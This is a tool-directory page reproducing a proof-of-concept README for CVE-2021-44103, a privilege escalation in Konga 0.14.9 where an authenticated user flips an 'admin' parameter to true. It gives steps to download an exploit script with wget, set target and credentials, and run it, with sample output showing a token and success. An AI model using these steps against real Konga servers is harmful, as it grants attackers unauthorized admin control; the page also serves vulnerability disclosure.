Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-44103 | Kitploit
Tools/GitHubGitHub/paulotrindadec/cve-2021-44103
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAPI Security
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

View Repository
33 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-44103

A proof of concept for KONGA 0.14.9 - Privilege Escalation.

Intro

On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator.

Report Vulnerability

Product: KONGA
Model: 0.14.9
Vulnerability: Privilege Escalation
Impact: Full admin access (vertical privilege escalation)
Authentication: required
Exploit Author: Fabricio Salomao / Paulo Trindade

PoC

Bellow has created a normal user called "usernormal" without privilege.

Crash

Crash

Through of request bellow was changed the flag "FALSE" in the parameter "admin" to "TRUE".

Crash

Therefore was created an exploit for us : https://www.exploit-db.com/exploits/50521

Crash

After running the exploit, the privilege escalation was a success!

Result:

Crash

Running the exploit

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

LINKS

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

Download Tool